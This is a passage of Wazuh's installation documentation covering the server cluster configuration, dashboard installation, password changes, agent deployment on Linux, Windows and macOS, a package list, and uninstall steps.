      <host>https://10.0.0.2:9200</host>
    </hosts>
    

    The Wazuh server prioritizes reporting to the first Wazuh indexer node in the list and switches to the next node if that one becomes unavailable.

Starting the Wazuh manager
  1. Enable and start the Wazuh manager service.

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
  2. Run the following command to verify the Wazuh manager status.

    # systemctl status wazuh-manager
    
Starting the Filebeat service
  1. Enable and start the Filebeat service.

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  2. Run the following command to verify that Filebeat is successfully installed.

    # filebeat test output
    

    Expand the output to see an example response.

    elasticsearch: https://127.0.0.1:9200...
      parse url... OK
      connection...
        parse host... OK
        dns lookup... OK
        addresses: 127.0.0.1
        dial up... OK
      TLS...
        security: server's certificate chain verification is enabled
        handshake... OK
        TLS version: TLSv1.3
        dial up... OK
      talk to server... OK
      version: 7.10.2
    

Your Wazuh server node is now successfully installed. Repeat this stage of the installation process for every Wazuh server node in your Wazuh cluster, then proceed with configuring the Wazuh cluster. If you want a Wazuh server single-node cluster, everything is set and you can proceed directly with Installing the Wazuh dashboard step by step.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Cluster configuration for multi-node deployment

After completing the installation of the Wazuh server on every node, configure only one server node as the master and the rest as workers.

Configuring the Wazuh server master node
  1. Edit the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
      <name>wazuh</name>
      <node_name>master-node</node_name>
      <node_type>master</node_type>
      <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
      <port>1516</port>
      <bind_addr>0.0.0.0</bind_addr>
      <nodes>
        <node><WAZUH_MASTER_ADDRESS></node>
      </nodes>
      <hidden>no</hidden>
      <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node.

    node_type

    It specifies the role of the node. It has to be set to master.

    key

    Key that is used to encrypt communication between cluster nodes. The key must be 32 characters long and the same for all of the nodes in the cluster. The following command can be used to generate a random key: openssl rand -hex 16.

    port

    It indicates the destination port for cluster communication.

    bind_addr

    It is the network IP to which the node is bound to listen for incoming requests (0.0.0.0 for any IP).

    nodes

    It is the address of the master node and can be either an IP or a DNS. This parameter must be specified in all nodes, including the master itself.

    hidden

    It shows or hides the cluster information in the generated alerts.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. This option must be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    
Configuring the Wazuh server worker nodes
  1. Configure the cluster node by editing the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
        <name>wazuh</name>
        <node_name>worker-node</node_name>
        <node_type>worker</node_type>
        <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
        <port>1516</port>
        <bind_addr>0.0.0.0</bind_addr>
        <nodes>
            <node><WAZUH_MASTER_ADDRESS></node>
        </nodes>
        <hidden>no</hidden>
        <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node. Each node of the cluster must have a unique name.

    node_type

    It specifies the role of the node. It has to be set to worker.

    key

    The key created previously for the master node. It has to be the same for all the nodes.

    nodes

    It has to contain the address of the master node and can be either an IP or a DNS.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. It has to be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    

Repeat these configuration steps for every Wazuh server worker node in your cluster.

Testing Wazuh server cluster

Run the following command to verify that the Wazuh cluster is enabled and all the nodes are connected:

# /var/ossec/bin/cluster_control -l

An example output of the command looks as follows:

NAME         TYPE    VERSION  ADDRESS
master-node  master  4.12.0   10.0.0.3
worker-node1 worker  4.12.0   10.0.0.4
worker-node2 worker  4.12.0   10.0.0.5

Note that 10.0.0.3, 10.0.0.4, 10.0.0.5 are example IPs.

Next steps

The Wazuh server installation is now complete, and you can proceed with Installing the Wazuh dashboard step by step.

If you want to uninstall the Wazuh server, see Uninstalling the Wazuh server.

Wazuh dashboard

This Wazuh central component is a flexible and intuitive web interface for mining, analyzing, and visualizing security data. It provides out-of-the-box dashboards, allowing you to seamlessly navigate through the user interface.

With the Wazuh dashboard, you can visualize security events, detected vulnerabilities, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and regulatory compliance standards. If you want to learn more about the Wazuh components, see the Getting started section.

Check the requirements below and choose an installation method to start installing the Wazuh dashboard.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh dashboard installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware requirements

The Wazuh dashboard can be installed on a dedicated node or along with the Wazuh indexer.

  • Hardware recommendations

    Component          Minimum                    Recommended
                       RAM (GB)    CPU (cores)    RAM (GB)    CPU (cores)
    Wazuh dashboard    4           2              8           4

Installing the Wazuh dashboard using the assisted installation method

Install and configure the Wazuh dashboard on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. Wazuh dashboard is a flexible and intuitive web interface for mining and visualizing security events and archives.

Wazuh dashboard installation
  1. Download the Wazuh installation assistant. You can skip this step if you have already installed Wazuh indexer on the same server.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-dashboard and the node name to install and configure the Wazuh dashboard. The node name must be the same one used in config.yml for the initial configuration, for example, dashboard:

    Note

    Make sure that a copy of wazuh-install-files.tar created during the Wazuh indexer installation is placed in your working directory.

    # bash wazuh-install.sh --wazuh-dashboard dashboard
    

    The default Wazuh web user interface port is 443, used by the Wazuh dashboard. You can change this port using the optional parameter -p <PORT_NUMBER> or --port <PORT_NUMBER>. Some recommended ports are 8443, 8444, 8080, 8888, and 9000.

    Once the Wazuh installation is completed, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
       User: admin
       Password: <ADMIN_PASSWORD>
    
    INFO: Installation finished.
    

    You now have installed and configured Wazuh. Find all passwords that the Wazuh installation assistant generated in the wazuh-passwords.txt file inside the wazuh-install-files.tar archive. Run the following command to print them:

    # tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt
    
  3. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser instead. Alternatively, you can configure a certificate from a trusted authority.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

All the Wazuh central components are successfully installed.

The Wazuh environment is now ready, and you can proceed with installing the Wazuh agent on the endpoints to be monitored. To perform this action, see the Wazuh agent section.

Installing the Wazuh dashboard step by step

Install and configure the Wazuh dashboard following step-by-step instructions. The Wazuh dashboard is a web interface for mining and visualizing the Wazuh server alerts and archived events.

Note

You need root user privileges to run all the commands described below.

Wazuh dashboard installation

Follow these steps to install the Wazuh dashboard.

Installing package dependencies
  1. Install the following packages if missing.

    # apt-get install debhelper tar curl libcap2-bin #debhelper version 9 or later
    
Adding the Wazuh repository

Note

If you are installing the Wazuh dashboard on the same host as the Wazuh indexer or the Wazuh server, you may skip these steps as you may have added the Wazuh repository already.

  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh dashboard
  1. Install the Wazuh dashboard package.

    # apt-get -y install wazuh-dashboard
    
Configuring the Wazuh dashboard
  1. Edit the /etc/wazuh-dashboard/opensearch_dashboards.yml file and replace the following values:

    1. server.host: This setting specifies the host of the Wazuh dashboard server. To allow remote users to connect, set the value to the IP address or DNS name of the Wazuh dashboard server. The value 0.0.0.0 will accept all the available IP addresses of the host.

    2. opensearch.hosts: The URLs of the Wazuh indexer instances to use for all your queries. The Wazuh dashboard can be configured to connect to multiple Wazuh indexer nodes in the same cluster. The addresses of the nodes can be separated by commas. For example, ["https://10.0.0.2:9200", "https://10.0.0.3:9200","https://10.0.0.4:9200"]

         server.host: 0.0.0.0
         server.port: 443
         opensearch.hosts: https://localhost:9200
         opensearch.ssl.verificationMode: certificate
      

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.

Deploying certificates

Note

Make sure that a copy of the wazuh-certificates.tar file, created during the initial configuration step, is placed in your working directory.

  1. Replace <DASHBOARD_NODE_NAME> with your Wazuh dashboard node name, the same one used in config.yml to create the certificates, and move the certificates to their corresponding location.

    # NODE_NAME=<DASHBOARD_NODE_NAME>
    
    # mkdir /etc/wazuh-dashboard/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/wazuh-dashboard/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./root-ca.pem
    # mv -n /etc/wazuh-dashboard/certs/$NODE_NAME.pem /etc/wazuh-dashboard/certs/dashboard.pem
    # mv -n /etc/wazuh-dashboard/certs/$NODE_NAME-key.pem /etc/wazuh-dashboard/certs/dashboard-key.pem
    # chmod 500 /etc/wazuh-dashboard/certs
    # chmod 400 /etc/wazuh-dashboard/certs/*
    # chown -R wazuh-dashboard:wazuh-dashboard /etc/wazuh-dashboard/certs
    
Starting the Wazuh dashboard service
  1. Enable and start the Wazuh dashboard service.

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    
  2. Edit the /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml file and replace <WAZUH_SERVER_IP_ADDRESS> with the IP address or hostname of the Wazuh server master node.

    hosts:
       - default:
          url: https://<WAZUH_SERVER_IP_ADDRESS>
          port: 55000
          username: wazuh-wui
          password: wazuh-wui
          run_as: false
    
  3. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: admin

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, you can configure a certificate from a trusted authority.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Securing your Wazuh installation

You have now installed and configured all the Wazuh central components. We recommend changing the default credentials to protect your infrastructure from possible attacks.

Select your deployment type and follow the instructions to change the default passwords for both the Wazuh API and the Wazuh indexer users.

  1. Use the Wazuh passwords tool to change all the internal users' passwords.

    # /usr/share/wazuh-indexer/plugins/opensearch-security/tools/wazuh-passwords-tool.sh --api --change-all --admin-user wazuh --admin-password wazuh
    
    INFO: The password for user admin is yWOzmNA.?Aoc+rQfDBcF71KZp?1xd7IO
    INFO: The password for user kibanaserver is nUa+66zY.eDF*2rRl5GKdgLxvgYQA+wo
    INFO: The password for user kibanaro is 0jHq.4i*VAgclnqFiXvZ5gtQq1D5LCcL
    INFO: The password for user logstash is hWW6U45rPoCT?oR.r.Baw2qaWz2iH8Ml
    INFO: The password for user readall is PNt5K+FpKDMO2TlxJ6Opb2D0mYl*I7FQ
    INFO: The password for user snapshotrestore is +GGz2noZZr2qVUK7xbtqjUup049tvLq.
    WARNING: Wazuh indexer passwords changed. Remember to update the password in the Wazuh dashboard and Filebeat nodes if necessary, and restart the services.
    INFO: The password for Wazuh API user wazuh is JYWz5Zdb3Yq+uOzOPyUU4oat0n60VmWI
    INFO: The password for Wazuh API user wazuh-wui is +fLddaCiZePxh24*?jC0nyNmgMGCKE+2
    INFO: Updated wazuh-wui user password in wazuh dashboard. Remember to restart the service.
    
Next steps

All the Wazuh central components are successfully installed and secured.

The Wazuh environment is now ready, and you can proceed with installing the Wazuh agent on the endpoints to be monitored. To perform this action, see the Wazuh agent section.

If you want to uninstall the Wazuh dashboard, see Uninstalling the Wazuh dashboard.

Wazuh agent

The Wazuh agent is multi-platform and runs on the endpoints that you want to monitor. It communicates with the Wazuh server, sending data in near real-time through an encrypted and authenticated channel.

The Wazuh agent is designed to monitor a wide variety of endpoints without impacting their performance. It is supported on the most popular operating systems, and it requires 35 MB of RAM on average.

The Wazuh agent provides key features to enhance your system’s security.

Log collector

Command execution

File integrity monitoring (FIM)

Security configuration assessment (SCA)

System inventory

Malware detection

Active Response

Container security

Cloud security

To install a Wazuh agent, select your operating system and follow the instructions.

If you are deploying Wazuh in a large environment, with a high number of servers or endpoints, keep in mind that this deployment might be easier using automation tools such as Puppet, Chef, SCCM, or Ansible.

Note

Compatibility between the Wazuh agent and the Wazuh manager is guaranteed when the Wazuh manager version is later than or equal to that of the Wazuh agent.

You can also deploy a new agent following the instructions in the Wazuh dashboard. Go to Agents management > Summary, and click on Deploy new agent.

Deploy new agent button

Then follow the steps on the Wazuh dashboard to deploy a new agent.

Deploy a new agent instructions
Deploying Wazuh agents on Linux endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel.

The deployment of a Wazuh agent on a Linux endpoint uses deployment variables that facilitate the task of installing, enrolling, and configuring the Wazuh agent. Alternatively, if you want to download the Wazuh agent package directly, see the packages list section.

Note

You need root user privileges to run all the commands described below.

Add the Wazuh repository

Add the Wazuh repository to download the official packages.

  1. Install the following packages if missing:

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key:

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository:

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the package information:

    # apt-get update
    

Note

For Debian 7, Debian 8, and Ubuntu 14 systems, use the following commands.

# apt-get install gnupg apt-transport-https
# curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
# echo "deb https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
# apt-get update
Deploy a Wazuh agent

Follow these steps to deploy the Wazuh agent on your Linux endpoint.

  1. Select your package manager and run the command below. Replace the WAZUH_MANAGER value with your Wazuh manager IP address or hostname:

    # WAZUH_MANAGER="10.0.0.2" apt-get install wazuh-agent
    

    For additional deployment options such as agent name, agent group, and enrollment password, see the Deployment variables for Linux section.

    Note

    Alternatively, if you want to install an agent without registering it, omit the deployment variables. To learn more about the different registration methods, see the Wazuh agent enrollment section.

  2. Enable and start the Wazuh agent service.

    # systemctl daemon-reload
    # systemctl enable wazuh-agent
    # systemctl start wazuh-agent
    

The deployment process is now complete, and the Wazuh agent is successfully running on your Linux system.
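You can optionally confirm that the agent service is running and review its log. The commands below assume the default installation path /var/ossec; the exact wording of the connection message in the log may vary between versions.

# systemctl status wazuh-agent
# tail -n 20 /var/ossec/logs/ossec.log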

Disable Wazuh updates

Compatibility between the Wazuh agent and the Wazuh manager is guaranteed when the Wazuh manager version is later than or equal to that of the Wazuh agent. Therefore, we recommend disabling the Wazuh repository to prevent accidental upgrades. To do so, use the following command:

# sed -i "s/^deb/#deb/" /etc/apt/sources.list.d/wazuh.list
# apt-get update

Alternatively, you can set the package state to hold. This stops automatic updates, but you can still upgrade the package manually using apt-get install.

# echo "wazuh-agent hold" | dpkg --set-selections
Deploying Wazuh agents on Windows endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel. You can deploy the Wazuh agent on Windows systems ranging from Windows 7 to the latest versions, including Windows 11 and Windows Server 2022.

Note

You must have administrator privileges to perform the installation.

  1. Download the Windows installer to start the installation process.

  2. Select the installation method you want to follow: command line interface (CLI) or graphical user interface (GUI).

    1. Choose one of the command shell alternatives to deploy the Wazuh agent on your endpoint. Run the command below and replace the WAZUH_MANAGER value with your Wazuh manager IP address or hostname. Ensure the downloaded Wazuh agent installation file is in your working directory.

      • Using CMD:

        > wazuh-agent-5.0.0-1.msi /q WAZUH_MANAGER="10.0.0.2"
        
      • Using PowerShell:

        > .\wazuh-agent-5.0.0-1.msi /q WAZUH_MANAGER="10.0.0.2"
        

      For additional deployment options such as agent name, agent group, and registration password, see the Deployment variables for Windows section.

    2. Start the Wazuh agent from the GUI or by running:

      • Using CMD:

        > NET START WazuhSvc
        
      • Using PowerShell:

        > Start-Service wazuhsvc
        

      The installation process is now complete and the Wazuh agent is successfully installed and configured.

      Note

      Alternatively, if you want to install an agent without enrolling it, omit the deployment variables. To learn more about the different enrollment methods, see the Wazuh agent enrollment section.

By default, all agent files are stored in C:\Program Files (x86)\ossec-agent after the installation.

Deploying Wazuh agents on macOS endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel.

Note

You need root user privileges to run all the commands described below.

  1. To start the installation process, download the Wazuh agent according to your architecture:

  2. Select the installation method you want to follow: Command line interface (CLI) or graphical user interface (GUI).

    1. To deploy the Wazuh agent on your endpoint, choose your architecture, edit the WAZUH_MANAGER variable to contain your Wazuh manager IP address or hostname, and run the following command.

      # echo "WAZUH_MANAGER='10.0.0.2'" > /tmp/wazuh_envs && sudo installer -pkg wazuh-agent-5.0.0-1.intel64.pkg -target /
      

      For additional deployment options such as agent name, agent group, and enrollment password, see the Deployment variables for macOS section.

      Note

      Alternatively, if you want to install an agent without enrolling it, omit the deployment variables. To learn more about the different enrollment methods, see the Wazuh agent enrollment section.

    2. Start the Wazuh agent to complete the installation process:

      # launchctl bootstrap system /Library/LaunchDaemons/com.wazuh.agent.plist
      

    The installation process is now complete, and the Wazuh agent is successfully deployed and running on your macOS endpoint.

By default, all agent files are stored in /Library/Ossec/ after the installation.
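You can optionally verify the agent status from the terminal. This is a sketch that assumes the wazuh-control utility ships under the default installation path shown above; older agent releases used ossec-control instead.

# /Library/Ossec/bin/wazuh-control status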

Packages list

This download page contains packages required for the Wazuh installation.

Wazuh indexer

Package type | Architecture | Package
RPM          | x86_64       | wazuh-indexer-5.0.0-1.x86_64.rpm (sha512)
RPM          | aarch64      | wazuh-indexer-5.0.0-1.aarch64.rpm (sha512)
DEB          | amd64        | wazuh-indexer_5.0.0-1_amd64.deb (sha512)
DEB          | arm64        | wazuh-indexer_5.0.0-1_arm64.deb (sha512)

Wazuh server
Wazuh manager

Distribution             | Version          | Architecture | Package
Amazon Linux             | 1 and later      | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
Amazon Linux             | 1 and later      | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
CentOS                   | 7 and later      | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
CentOS                   | 7 and later      | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
Debian                   | 8 and later      | x86_64       | wazuh-manager_5.0.0-1_amd64.deb (sha512)
Debian                   | 8 and later      | aarch64      | wazuh-manager_5.0.0-1_arm64.deb (sha512)
Fedora                   | 22 and later     | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
Fedora                   | 22 and later     | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
OpenSUSE                 | 42 and later     | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
OpenSUSE                 | 42 and later     | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
Oracle Linux             | 7 and later      | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
Oracle Linux             | 7 and later      | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
Red Hat Enterprise Linux | 7 and later      | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
Red Hat Enterprise Linux | 7 and later      | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
SUSE                     | 12               | x86_64       | wazuh-manager-5.0.0-1.x86_64.rpm (sha512)
SUSE                     | 12               | aarch64      | wazuh-manager-5.0.0-1.aarch64.rpm (sha512)
Ubuntu                   | 13 and later     | x86_64       | wazuh-manager_5.0.0-1_amd64.deb (sha512)
Ubuntu                   | 13 and later     | aarch64      | wazuh-manager_5.0.0-1_arm64.deb (sha512)
Raspbian OS              | Buster and later | aarch64      | wazuh-manager_5.0.0-1_arm64.deb (sha512)

Filebeat

Package type | Architecture | Package
RPM          | x86_64       | filebeat-7.10.2-2.x86_64.rpm (sha512)
RPM          | aarch64      | filebeat-7.10.2-2.aarch64.rpm (sha512)
DEB          | amd64        | filebeat_7.10.2-2_amd64.deb (sha512)
DEB          | arm64        | filebeat_7.10.2-2_arm64.deb (sha512)

Wazuh dashboard

Package type | Architecture | Package
RPM          | x86_64       | wazuh-dashboard-5.0.0-1.x86_64.rpm (sha512)
RPM          | aarch64      | wazuh-dashboard-5.0.0-1.aarch64.rpm (sha512)
DEB          | amd64        | wazuh-dashboard_5.0.0-1_amd64.deb (sha512)
DEB          | arm64        | wazuh-dashboard_5.0.0-1_arm64.deb (sha512)

Wazuh agent
Linux

Distribution             | Version          | Architecture | Package
AlmaLinux                | 10 and later     | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
AlmaLinux                | 10 and later     | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
Amazon Linux             | 2                | powerpc      | wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)
Amazon Linux             | 1 and later      | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
Amazon Linux             | 1 and later      | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
CentOS                   | 7 and later      | powerpc      | wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)
CentOS                   | 6 and later      | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
CentOS                   | 6 and later      | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
CentOS                   | 6 and later      | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
CentOS                   | 6 and later      | armhf        | wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)
Debian                   | 9 and later      | powerpc      | wazuh-agent_5.0.0-1_ppc64el.deb (sha512)
Debian                   | 7 and later      | i386         | wazuh-agent_5.0.0-1_i386.deb (sha512)
Debian                   | 7 and later      | x86_64       | wazuh-agent_5.0.0-1_amd64.deb (sha512)
Debian                   | 7 and later      | aarch64      | wazuh-agent_5.0.0-1_arm64.deb (sha512)
Debian                   | 7 and later      | armhf        | wazuh-agent_5.0.0-1_armhf.deb (sha512)
Fedora                   | 22 and later     | powerpc      | wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)
Fedora                   | 22 and later     | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
Fedora                   | 22 and later     | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
Fedora                   | 22 and later     | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
Fedora                   | 22 and later     | armhf        | wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)
OpenSUSE                 | 42 and later     | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
OpenSUSE                 | 42 and later     | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
OpenSUSE                 | 42 and later     | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
OpenSUSE                 | 42 and later     | armhf        | wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)
Oracle Linux             | 6 and later      | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
Oracle Linux             | 6 and later      | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
Oracle Linux             | 6 and later      | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
Red Hat Enterprise Linux | 6 and later      | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
Red Hat Enterprise Linux | 6 and later      | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
Red Hat Enterprise Linux | 6 and later      | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
RockyLinux               | 10 and later     | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
RockyLinux               | 10 and later     | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
SUSE                     | 12               | i386         | wazuh-agent-5.0.0-1.i386.rpm (sha512)
SUSE                     | 12               | x86_64       | wazuh-agent-5.0.0-1.x86_64.rpm (sha512)
SUSE                     | 12               | aarch64      | wazuh-agent-5.0.0-1.aarch64.rpm (sha512)
SUSE                     | 12               | armhf        | wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)
Ubuntu                   | 12 and later     | i386         | wazuh-agent_5.0.0-1_i386.deb (sha512)
Ubuntu                   | 12 and later     | x86_64       | wazuh-agent_5.0.0-1_amd64.deb (sha512)
Ubuntu                   | 12 and later     | aarch64      | wazuh-agent_5.0.0-1_arm64.deb (sha512)
Ubuntu                   | 12 and later     | armhf        | wazuh-agent_5.0.0-1_armhf.deb (sha512)
Raspbian OS              | Buster and later | aarch64      | wazuh-agent_5.0.0-1_arm64.deb (sha512)
Raspbian OS              | Buster and later | armhf        | wazuh-agent_5.0.0-1_armhf.deb (sha512)

Windows

Version            | Architecture | Package
Windows 7 or later | 32/64 bits   | wazuh-agent-5.0.0-1.msi (sha512)

macOS

Architecture  | Package
Intel         | wazuh-agent-5.0.0-1.intel64.pkg (sha512)
Apple silicon | wazuh-agent-5.0.0-1.arm64.pkg (sha512)

Uninstalling Wazuh

This section describes how to uninstall the Wazuh central components and the Wazuh agent.

Note

You need root user privileges to run all the commands described below.

Uninstalling the Wazuh central components

Follow these steps to uninstall the Wazuh central components using the Wazuh installation assistant.

  1. Download the Wazuh installation assistant:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option -u or --uninstall as follows:

    # bash wazuh-install.sh --uninstall
    

This will remove the Wazuh indexer, the Wazuh server, and the Wazuh dashboard.

Uninstalling Wazuh components

Choose from the options below to uninstall a Wazuh component.

Uninstalling the Wazuh dashboard

Follow the step below to uninstall the Wazuh dashboard using your package manager.

  1. Remove the Wazuh dashboard installation.

    # apt-get remove --purge wazuh-dashboard -y
    
Uninstalling the Wazuh server

Follow these steps to uninstall the Wazuh manager and filebeat using your package manager.

  1. Remove the Wazuh manager installation.

    # apt-get remove --purge wazuh-manager -y
    
  2. Remove the Filebeat installation.

    # apt-get remove --purge filebeat -y
    
Uninstalling the Wazuh indexer

Follow the step below to uninstall the Wazuh indexer using your package manager.

  1. Remove the Wazuh indexer installation.

    # apt-get remove --purge wazuh-indexer -y
    
Uninstalling the Wazuh agent

This section describes how to uninstall Wazuh agents installed across the different operating systems below:

Uninstalling a Linux Wazuh agent

Run the following commands to uninstall a Linux agent.

Note

To uninstall the Wazuh agent from a Linux endpoint with the anti-tampering feature enabled, refer to Uninstalling an agent with anti-tampering enabled.

  1. Remove the Wazuh agent installation.

    # apt-get remove wazuh-agent
    

    Some files are marked as configuration files. Due to this designation, the package manager does not remove them from the filesystem. If you want to remove all files completely, run the following command:

    # apt-get remove --purge wazuh-agent
    
  2. Disable the Wazuh agent service.

    # systemctl disable wazuh-agent
    # systemctl daemon-reload
    

The Wazuh agent is now completely removed from your Linux endpoint.

Uninstalling a Windows Wazuh agent

To uninstall the Wazuh agent, ensure the original Windows installer file is in your working directory and run the following command:

> msiexec.exe /x wazuh-agent-5.0.0-1.msi /qn

The Wazuh agent is now completely removed from your Windows endpoint.

Uninstalling a macOS Wazuh agent

Follow these steps to uninstall the Wazuh agent from your macOS endpoint.

  1. Stop the Wazuh agent service.

    # launchctl bootout system /Library/LaunchDaemons/com.wazuh.agent.plist
    
  2. Remove the /Library/Ossec/ folder.

    # /bin/rm -r /Library/Ossec
    
  3. Remove launchdaemons and StartupItems.

    # /bin/rm -f /Library/LaunchDaemons/com.wazuh.agent.plist
    # /bin/rm -rf /Library/StartupItems/WAZUH
    
  4. Remove the Wazuh user and group.

    # /usr/bin/dscl . -delete "/Users/wazuh"
    # /usr/bin/dscl . -delete "/Groups/wazuh"
    
  5. Remove from pkgutil.

    # /usr/sbin/pkgutil --forget com.wazuh.pkg.wazuh-agent
    

The Wazuh agent is now completely removed from your macOS endpoint.

Installation alternatives

You can install Wazuh using other deployment options. These are complementary to the installation methods you can find in the Installation guide and the Quickstart.

Installing the Wazuh central components

All the alternatives include instructions on how to install the Wazuh central components. After these are installed, you then need to deploy agents to your endpoints.

Ready-to-use machines

  • Virtual machine (VM): Wazuh provides a pre-built virtual machine image (OVA) that you can directly import using VirtualBox or other OVA compatible virtualization systems.

